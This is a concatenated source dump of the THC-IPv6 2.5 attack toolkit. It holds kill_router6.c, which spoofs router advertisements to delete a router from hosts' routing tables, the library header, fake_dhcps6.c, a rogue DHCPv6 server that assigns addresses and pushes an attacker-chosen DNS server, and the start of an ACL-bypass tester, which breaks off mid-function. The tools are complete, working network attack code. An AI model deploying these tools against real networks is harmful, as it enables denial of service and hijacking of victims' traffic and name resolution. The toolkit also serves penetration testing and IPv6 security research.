thc-ipv6-2.5/kill_router6.c0000644000000000000000000001442512251022440014301 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6; unsigned char *frip6, *frmac, *frdst; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface router-address [srcmac [dstmac]]\n\n", prg); printf("Announce that a target a router going down to delete it from the routing tables.\n"); printf("If you supply a '*' as router-address, this tool will sniff the network for any\n"); printf("RA packet and immediately send the kill packet.\n"); printf("Option -H adds hop-by-hop, -F fragmentation header and -D dst header.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void send_ra_kill(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *pkt = NULL, *src = (unsigned char *) data + 14 + 8, *srcmac = (unsigned char *) data + 6, *ipv6hdr = (unsigned char *) (data + 14), *target; int pkt_len = 0, cnt, i, len = header->caplen - 14, offset = 14; if (do_hdr_size) { src = (unsigned char *) (data + 8 + do_hdr_size); // srcmac is ignore anyway ipv6hdr = (unsigned char *) (data + do_hdr_size); len = header->caplen - do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; offset = do_hdr_size; } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERADV || len < 40 + 16 || (ipv6hdr[46] == 0 && ipv6hdr[47] == 0)) return; if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, src, frdst, 255, 0, 0, 0xe0, 0)) == NULL) return; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0) return; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0x40080000, frbuf, frbuflen, 0) < 0) return; if (do_dst) { thc_generate_pkt(frint, srcmac, NULL, pkt, &pkt_len); frhdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(frint, src, frdst, type, frhdr->pkt + 40 + offset, frhdr->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(frint, srcmac, NULL, pkt, &pkt_len) < 0) return; } target = thc_ipv62notation(src); printf("Sent RA kill packet for %s\n", target); free(target); pkt = thc_destroy_packet(pkt); } int main(int argc, char *argv[]) { char *interface, mac[16] = "", dmac[16] = "", string[] = "ip6 and icmp6 and dst ff02::1"; unsigned char *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6]; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = dmac; int i, cnt, offset = 14; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); frdst = dst; while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; frint = argv[optind]; if (argc - optind >= 4 && (ptr = argv[optind + 3]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); else dstmac = NULL; if (argc - optind >= 3 && (ptr = argv[optind + 2]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') { ip6 = NULL; } else { ip6 = thc_resolve6(argv[optind + 1]); if (ip6 == NULL) { fprintf(stderr, "Error: target-router address is invalid: %s\n", argv[optind + 1]); exit(-1); } } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); i = 8; frbuflen = i; if ((p = thc_pcap_init_promisc(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0x40080000, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; printf("Starting to sending router kill entries for %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (ip6 == NULL) { while (thc_pcap_check(p, (char *) send_ra_kill, NULL) > 0); } else { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + offset, frhdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } sleep(3); printf("RA kill packet to %s sent.\n", argv[optind + 1]); } usleep(60); } return 0; } thc-ipv6-2.5/thc-ipv6.h0000644000000000000000000003171112254534432013336 0ustar rootroot/* * (c) 2013 by van Hauser / THC * * THC IPv6 Attack Library Header Files * * License: AGPL v3.0 (see LICENSE file) * */ #ifndef _THC_IPV6_H #define _THC_IPV6_H #include #include #ifdef _HAVE_SSL #include #endif #define VERSION "v2.5" #define AUTHOR "van Hauser / THC " #define RESOURCE "www.thc.org" // you can change the following if you want to: #define SHOW_LIBRARY_ERRORS 1 //#define MULTICAST_ALL_NODES #define ICMP6_UNREACH 1 #define ICMP6_TOOBIG 2 #define ICMP6_TTLEXEED 3 #define ICMP6_PARAMPROB 4 #define ICMP6_PING 128 #define ICMP6_PONG 129 #define ICMP6_PINGREQUEST 128 #define ICMP6_PINGREPLY 129 #define ICMP6_ECHOREQUEST 128 #define ICMP6_ECHOREPLY 129 #define ICMP6_MLD_QUERY 130 #define ICMP6_MLD_REPORT 131 #define ICMP6_MLD_DONE 132 #define ICMP6_ROUTERSOL 133 #define ICMP6_ROUTERADV 134 #define ICMP6_NEIGHBORSOL 135 #define ICMP6_NEIGHBORADV 136 #define ICMP6_REDIR 137 #define ICMP6_INFOREQUEST 139 #define ICMP6_NODEQUERY 139 #define ICMP6_INFOREPLY 140 #define ICMP6_NODEREPLY 140 #define ICMP6_INVNEIGHBORSOL 141 #define ICMP6_INVNEIGHBORADV 142 #define ICMP6_MLD2_REPORT 143 #define ICMP6_MOBILE_PREFIXSOL 146 #define ICMP6_MOBILE_PREFIXADV 147 #define ICMP6_CERTPATHSOL 148 #define ICMP6_CERTPATHADV 149 #define ICMP6_MLD_ROUTERADV 151 #define ICMP6_MLD_ROUTERSOL 152 #define ICMP6_MLD_ROUTERTERMINATION 153 #define ICMP6_ROUTERPROXYSOL 154 #define ICMP6_ROUTERPROXYADV 155 #define ICMP6_NEIGHBORADV_ROUTER 0x80000000 #define ICMP6_NEIGHBORADV_SOLICIT 0x40000000 #define ICMP6_NEIGHBORADV_OVERRIDE 0x20000000 #define PREFER_HOST 16 #define PREFER_LINK 32 #define PREFER_GLOBAL 0 #if __BYTE_ORDER == __LITTLE_ENDIAN #define _TAKE4 0 #define _TAKE3 0 #define _TAKE2 0 #elif __BYTE_ORDER == __BIG_ENDIAN #define _TAKE4 (sizeof(void*) - 4) #define _TAKE3 (sizeof(void*) - 3) #define _TAKE2 (sizeof(void*) - 2) #else #error "Unknown Byte Order!" #endif extern int debug; extern int _thc_ipv6_showerrors; extern int do_hdr_size; extern void thc_ipv6_show_errors(int mode); extern int thc_pcap_function(char *interface, char *capture, char *function, int promisc, char *opt); extern pcap_t *thc_pcap_init(char *interface, char *capture); extern pcap_t *thc_pcap_init_promisc(char *interface, unsigned char *capture); extern void thc_ipv6_rawmode(int mode); extern int thc_pcap_check(pcap_t * p, char *function, char *opt); extern char *thc_pcap_close(pcap_t * p); extern unsigned char *thc_resolve6(char *target); extern unsigned char *thc_lookup_ipv6_mac(char *interface, unsigned char *dst); extern unsigned char *thc_get_own_mac(char *interface); extern int thc_get_mtu(char *interface); extern unsigned char *thc_get_own_ipv6(char *interface, unsigned char *dst, int prefer); extern unsigned char *thc_get_multicast_mac(unsigned char *dst); extern unsigned char *thc_get_mac(char *interface, unsigned char *src, unsigned char *dst); extern unsigned char *thc_inverse_packet(unsigned char *pkt, int pkt_len); extern int thc_ping6(char *interface, unsigned char *src, unsigned char *dst, int size, int count); extern int thc_ping26(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst, int size, int count); extern int thc_neighboradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac, unsigned int flags, unsigned char *target); extern int thc_neighborsol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *target, unsigned char *srcmac, unsigned char *dstmac); extern int thc_routeradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char default_ttl, int managed, unsigned char *prefix, int prefixlen, int mtu, unsigned int lifetime); extern int thc_routersol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac); extern int thc_toobig6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned int mtu, unsigned char *pkt, int pkt_len); extern int thc_paramprob6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned int pointer, unsigned char *pkt, int pkt_len); extern int thc_unreach6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned char *pkt, int pkt_len); extern int thc_redir6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char *newrouter, unsigned char *newroutermac, unsigned char *pkt, int pkt_len); extern int thc_send_as_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len); extern int thc_send_as_overlapping_first_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type); extern int thc_send_as_overlapping_last_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len, int overlap_spoof_type); extern unsigned char *thc_create_ipv6(char *interface, int *pkt_len, unsigned char *src, unsigned char *dst); extern unsigned char *thc_create_ipv6_extended(char *interface, int prefer, int *pkt_len, unsigned char *src, unsigned char *dst, int ttl, int length, int label, int class, int version); extern int thc_add_hdr_misc(unsigned char *pkt, int *pkt_len, unsigned char type, int len, unsigned char *buf, int buflen); extern int thc_add_hdr_route(unsigned char *pkt, int *pkt_len, unsigned char **routers, unsigned char routerptr); extern int thc_add_hdr_mobileroute(unsigned char *pkt, int *pkt_len, unsigned char *dst); extern int thc_add_hdr_oneshotfragment(unsigned char *pkt, int *pkt_len, unsigned int id); extern int thc_add_hdr_fragment(unsigned char *pkt, int *pkt_len, int offset, char more_frags, unsigned int id); extern int thc_add_hdr_dst(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen); extern int thc_add_hdr_hopbyhop(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen); extern int thc_add_hdr_nonxt(unsigned char *pkt, int *pkt_len, int hdropt); extern int thc_add_icmp6(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, int checksum); extern int thc_add_pim(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len); extern int thc_add_tcp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int sequence, unsigned int ack, unsigned char flags, unsigned short int window, unsigned short int urgent, char *option, int option_len, char *data, int data_len); extern int thc_add_udp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int checksum, char *data, int data_len); extern int thc_add_ipv4(unsigned char *pkt, int *pkt_len, int src, int dst); extern int thc_add_ipv4_extended(unsigned char *pkt, int *pkt_len, int src, int dst, unsigned char tos, int id, unsigned char ttl); extern int thc_add_ipv4_rudimentary(unsigned char *pkt, int *pkt_len, int src, int dst, int port); extern int thc_add_data6(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len); extern int thc_generate_and_send_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len); extern int thc_generate_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len); extern int thc_send_pkt(char *interface, unsigned char *pkt, int *pkt_len); extern unsigned char *thc_destroy_packet(unsigned char *pkt); extern int thc_open_ipv6(); extern int thc_is_dst_local(char *interface, unsigned char *dst); extern int checksum_pseudo_header(unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int length); extern int calculate_checksum(unsigned char *data, int data_len); extern void thc_dump_data(unsigned char *buf, int len, char *text); extern unsigned char *thc_ipv62string(unsigned char *ipv6); extern unsigned char *thc_string2ipv6(unsigned char *string); extern unsigned char *thc_string2notation(unsigned char *string); extern unsigned char *thc_ipv62notation(unsigned char *string); extern unsigned char *thc_memstr(char *haystack, char *needle, int haystack_length, int needle_length); extern void thc_notation2beauty(unsigned char *ipv6); extern int thc_bind_udp_port(int port); extern int thc_bind_multicast_to_socket(int s, char *interface, char *src); #define DO_CHECKSUM 0xfaf4 #define NXT_IP6 41 #define NXT_IPV6 41 #define NXT_INVALID 128 #define NXT_IGNORE 31 #define NXT_HDR 0 #define NXT_HOP 0 #define NXT_HBH 0 #define NXT_ROUTE 43 #define NXT_FRAG 44 #define NXT_NONXT 59 #define NXT_OPTS 60 #define NXT_DST 60 #define NXT_ESP 50 #define NXT_AH 51 #define NXT_MIPV6 135 #define NXT_MOBILITY 135 #define NXT_PIM 103 #define NXT_ICMP6 58 #define NXT_TCP 6 #define NXT_UDP 17 #define NXT_DATA 255 #define NXT_HOSTID 139 #define NXT_HOSTIDENTIFICATION 139 #define NXT_SHIM 140 #define NXT_SHIM6 140 #define NXT_IP4 4 #define NXT_IPV4 4 #define NXT_IP4_RUDIMENTARY 0xf4 #define NXT_IPV4_RUDIMENTARY 0xf4 #define NXT_IPIP 4 #define NXT_ICMP4 1 #define IPV6_FRAME_TYPE 0x86dd #define TCP_CWR 128 #define TCP_ECN 64 #define TCP_URG 32 #define TCP_ACK 16 #define TCP_PSH 8 #define TCP_RST 4 #define TCP_SYN 2 #define TCP_FIN 1 typedef struct { unsigned char dst[6]; unsigned char src[6]; unsigned int type:16; } thc_ethernet; typedef struct { unsigned char *pkt; int pkt_len; char *next_segment; char *final; int final_type; unsigned int version; // :4; unsigned char class; unsigned int label; // :20; unsigned int length; // :16; unsigned char next; unsigned char ttl; unsigned char src[16]; unsigned char dst[16]; unsigned char *final_dst; unsigned char *original_src; } thc_ipv6_hdr; typedef struct { char *next_segment; unsigned char next; unsigned char length; unsigned char *data; int data_len; } thc_ipv6_ext_hdr; typedef struct { unsigned char type; unsigned char code; unsigned int checksum:16; unsigned int flags; unsigned char *data; int data_len; } thc_icmp6_hdr; typedef struct { unsigned short int sport; unsigned short int dport; unsigned int sequence; unsigned int ack; unsigned char length; unsigned char flags; unsigned short int window; unsigned short int checksum; unsigned short int urgent; unsigned char *option; int option_len; unsigned char *data; int data_len; } thc_tcp_hdr; typedef struct { unsigned short int sport; unsigned short int dport; unsigned short int length; unsigned short int checksum; unsigned char *data; int data_len; } thc_udp_hdr; typedef struct { unsigned char ver_hlen; unsigned char tos; unsigned short int size; unsigned short int id; unsigned short int frag; unsigned char ttl; unsigned char proto; unsigned short int checksum; unsigned int src; unsigned int dst; } thc_ipv4_hdr; typedef struct { char *next_segment; char dummy[8]; } thc_dummy_hdr; /* typedef struct { unsigned int nlmsg_len; unsigned short nlmsg_type; unsigned short nlmsg_flags; unsigned int nlmsg_seq; unsigned int nlmsg_pid; } nlmsghdr; typedef struct { unsigned char rtgen_family; } rtgenmsg; typedef struct { nlmsghdr nlh; rtgenmsg g; } neigh_req; typedef struct { unsigned short nl_family; unsigned short nl_pad; unsigned int nl_pid; unsigned int nl_groups; } sockaddr_nl; */ #ifdef _HAVE_SSL typedef struct { unsigned char type; unsigned char len; unsigned char pad_len; unsigned char resv; /* cga params */ unsigned char modifier[16]; unsigned char prefix[8]; unsigned char collision_cnt; unsigned char coll2; unsigned char *pub_key; unsigned char *exts; /* end of cga params */ unsigned char *pad; } thc_cga_hdr; typedef struct { unsigned char type; unsigned char len; unsigned char resv[6]; unsigned long long timeval; } thc_timestamp_hdr; typedef struct { unsigned char type; unsigned char len; char nonce[6]; } thc_nonce_hdr; typedef struct { unsigned char type; unsigned char len; short int resv; unsigned char key_hash[16]; char *sign; char *pad; } thc_rsa_hdr; typedef struct { RSA *rsa; int len; } thc_key_t; typedef struct { unsigned char *data; /* DER-encoded key length */ int len; } opt_t; extern thc_key_t *thc_generate_key(int key_len); extern thc_cga_hdr *thc_generate_cga(unsigned char *prefix, thc_key_t * key, unsigned char **cga); extern int thc_add_send(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, thc_cga_hdr * cga_hdr, thc_key_t * key, unsigned char *tag, int checksum); #endif #endif thc-ipv6-2.5/fake_dhcps6.c0000644000000000000000000002656412251022435014050 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface network-address/prefix-length dns-server [dhcp-server-ip-address [mac-address]]\n\n", prg); printf("Fake DHCPv6 server. Use to configure an address and set a DNS server\n"); exit(-1); } int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024]; unsigned char *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3; unsigned char *dns; int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen, csize = 0; static struct iovec iov; struct sockaddr_storage from; struct msghdr mhdr; struct sockaddr_in6 ddst; unsigned long long int count = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (strcmp(argv[1], "-r") == 0) { // is ignored argv++; argc--; } memset(mac, 0, sizeof(mac)); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc >= 6 && (ptr = argv[5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc >= 5 && argv[4] != NULL) ip6 = thc_resolve6(argv[4]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (argc >= 4 && argv[3] != NULL) dns = thc_resolve6(argv[3]); else dns = thc_resolve6("ff02::fb"); routerip = argv[2]; if ((ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[2]); exit(-1); } if (size < 64) { fprintf(stderr, "Warning: network prefix must be a minimum of /64, resizing to /64\n"); size = 64; } if (size % 8 > 0) { size = ((size / 8) + 1) * 8; fprintf(stderr, "Warning: prefix must be a multiple of 8, resizing to /%d\n", csize * 8); } csize = 8 - ((size - 64) / 8); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]); exit(-1); } /* if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); */ if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } if ((s = thc_bind_udp_port(547)) < 0) { fprintf(stderr, "Error: could not bind to 547/udp\n"); exit(-1); } if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) < 0 || thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) < 0) { fprintf(stderr, "Error: could not bind multicast address\n"); exit(-1); } if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) { perror("Error:"); exit(-1); } memset(mybuf, 0, sizeof(mybuf)); mybuf[1] = 2; mybuf[3] = 14; mybuf[5] = 1; mybuf[7] = 1; // mybuf + 8 == time memcpy(mybuf + 12, mac6, 6); mlen = 18; mybuf[mlen + 1] = 23; mybuf[mlen + 3] = 16; memcpy(mybuf + mlen + 4, dns, 16); mlen += 20; printf("Starting to fake dhcp6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]); while (1) { memset((char *) &from, 0, sizeof(from)); memset(&iov, 0, sizeof(iov)); memset(&mhdr, 0, sizeof(mhdr)); iov.iov_base = rdatabuf; iov.iov_len = sizeof(rdatabuf); mhdr.msg_name = &from; mhdr.msg_namelen = sizeof(from); mhdr.msg_iov = &iov; mhdr.msg_iovlen = 1; mhdr.msg_control = (caddr_t) cmsgbuf; mhdr.msg_controllen = sizeof(cmsgbuf); if ((len = recvmsg(s, &mhdr, 0)) > 0) { fromlen = mhdr.msg_namelen; if (debug) thc_dump_data(rdatabuf, len, "Received Packet"); ddst.sin6_addr = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_addr; ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr); switch (rdatabuf[0]) { case 1: ptr1 = "Solicitate"; break; case 2: ptr1 = "Advertise (illegal, ignored)"; break; case 3: ptr1 = "Request"; break; case 4: ptr1 = "Confirm"; break; case 5: ptr1 = "Renew"; break; case 6: ptr1 = "Rebind"; break; case 7: ptr1 = "Reply (illegal, ignored)"; break; case 8: ptr1 = "Release (ignored)"; break; case 9: ptr1 = "Decline (ignored)"; break; case 10: ptr1 = "Reconfigure (illegal, ignored)"; break; case 11: ptr1 = "Information Request (ignored)"; break; case 12: ptr1 = "Relay Forward (ignored)"; break; case 13: ptr1 = "Relay Reply (ignored)"; break; default: ptr1 = "Unknown (ignored)"; break; } printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2); free(ptr2); if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) { memset(wdatabuf, 0, sizeof(wdatabuf)); memcpy(wdatabuf + 1, rdatabuf + 1, 3); i = j = 4; k = -1; if (rdatabuf[0] == 1) { // initial request wdatabuf[0] = 2; while ((j + 4) < len) { l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3]; if (l + j + 4 > len) { l = 0; j = len; printf("Info: received evil packet\n"); } else { if (rdatabuf[j + 1] == 1) { memcpy(wdatabuf + i, rdatabuf + j, l + 4); i += l + 4; } else if (rdatabuf[j + 1] == 3) { k = j; // just set a pointer } j += l + 4; } } // add 02, 23 j = time(NULL); memcpy(mybuf + 8, (char *) &j + _TAKE4, 4); memcpy(wdatabuf + i, mybuf, mlen); i += mlen; // now expand 3 if (k > -1 && rdatabuf[k + 3] == 12 && rdatabuf[k + 2] == 0) { // copy structure memcpy(wdatabuf + i, rdatabuf + k, 16); } else { // or create new wdatabuf[i + 1] = 3; memcpy(wdatabuf + i + 4, (char *) &j + _TAKE4, 4); // copy time as IAID } wdatabuf[i + 3] = 40; memset(wdatabuf + i + 8, 0, 8); wdatabuf[i + 10] = 0x7f; wdatabuf[i + 14] = 0xfe; i += 16; wdatabuf[i + 1] = 5; wdatabuf[i + 3] = 24; memcpy(wdatabuf + i + 4, routerip6, 16); // address count++; if (csize > 0) memcpy(wdatabuf + i + 4 + 16 - csize, (char *) &count, csize); // counter ptr3 = thc_ipv62notation(wdatabuf + i + 4); wdatabuf[i + 21] = 2; wdatabuf[i + 25] = 2; i += 28; } else { wdatabuf[0] = 7; m = 0; while ((j + 4) < len) { l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3]; if (l + j + 4 > len) { l = 0; j = len; printf("Info: received evil packet\n"); } else { // just copy types 1-3 and 23 if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) || rdatabuf[j + 1] == 23) { memcpy(wdatabuf + i, rdatabuf + j, l + 4); i += l + 4; if (rdatabuf[j + 1] == 23) k = 1; if (rdatabuf[j + 1] == 3) m = 1; } j += l + 4; } } if (k == -1) { memcpy(wdatabuf + i, mybuf + 18, 20); i += 20; } } len = i; if (debug) thc_dump_data(wdatabuf, len, "Reply Packet"); ddst.sin6_family = AF_INET6; ddst.sin6_port = htons(546); //ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr; ddst.sin6_scope_id = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_scope_id; if (sendto(t, wdatabuf, len, 0, (struct sockaddr *) &ddst, sizeof(ddst)) < 0) perror("Error:"); else { ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr); if (wdatabuf[0] == 2) { printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2, ptr3); free(ptr3); } else if (m) printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2); else printf("Sent DHCP6 Reply packet to %s (did not set address)\n", ptr2); free(ptr2); } } } } /* packet structure: 1 byte = type 3 bytes = sessionid while(packet data) { 2 bytes = type 2 bytes = length in bytes of following data ... defined fixed length data ... } server listen on ff02::1:2 udp 547 client connects from linklocal port 546, ttl 1 01 = solicit 3 bytes = sessionid 6 bytes = blog (elapsed, 8) 8 bytes = 01 blob (client id + time + mac) 4 bytes = time 6 bytes = mac 16 bytes = 03 blob (want perm address) 5 + length + hostname = hostname 18 bytes = blob (vendor class, type 16) 12 bytes = blob (requested options, type 6) server sends to linklocal (respect client port), ttl 1 02 = advertise 3 bytes = sessionid (copy) 18 bytes = 01 blob (client copy of client-id) 8 bytes = 02 blob (server id + time + mac) 4 bytes = time 6 bytes = mac 0003 = give perm address 2 bytes = length 4 bytes = IAID (from client request!) 4 bytes = validity time 1 (1800) 4 bytes = validity time 2 (2880) 0005 = address structure 2 bytes = length (24 bytes) 16 bytes = address 4 bytes = validity time (3600) 4 byte = validity time (same) 0023 = dns option 2 bytes = length (16 bytes) 16 bytes = dns server address client sends to ff02::1:2 ! 03 = request 3 bytes = sessionid 6 bytes = blog (elapsed, 8) 8 bytes = 01 blob (client id + time + mac) 4 bytes = time 6 bytes = mac 18 bytes = client (again) 18 bytes = server (copy) 44 bytes = address (copy) 5 + length + hostname = hostname (again) 18 bytes = blob again (vendor class, type 16) 12 bytes = blob again (requested options, type 6) server replies 7 = reply copy original advertise packet :-) */ return 0; // never reached } thc-ipv6-2.5/firewall6.c0000644000000000000000000020031612251022436013554 0ustar rootroot/* * Tests the implementation of ACLs for bypassing attacks * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" extern int do_6in4; extern int do_pppoe; extern int do_hdr_vlan; extern int do_hdr_off; int sports[] = { 20, 21, 22, 25, 53, 80, 111, 123, 179, 443, 8080, -1 } ; int sports2[] = { 20, 53, 67, 68, 69, 111, 123, 161, 162, 2049, -1 } ; int matched = 0, port = -1, udp = 0, sport = 21000, cport, count = 0, poffset, poffset2, ptype, only = 0, pingtest = 0, do_hop = 0; unsigned char *dst, *psrc, is_srcport = 0; pcap_t *p; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-Hu] interface destination port [test-case-no]\n\n", prg); printf("Performs various ACL bypass attempts to check implementations.\n"); printf("Defaults to TCP ports, option -u switches to UDP.\nOption -H prints the hop count.\n"); printf("For all test cases to work, ICMPv6 ping to the destination must be allowed.\n"); exit(-1); } void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { return; } void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) (data + 14); int len = header->caplen - 14, nxt = 6, offset = 0; unsigned short int rsport, rdport; matched = -1; if (do_hdr_size) { ptr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } if (ptr[nxt] == NXT_FRAG) { offset += 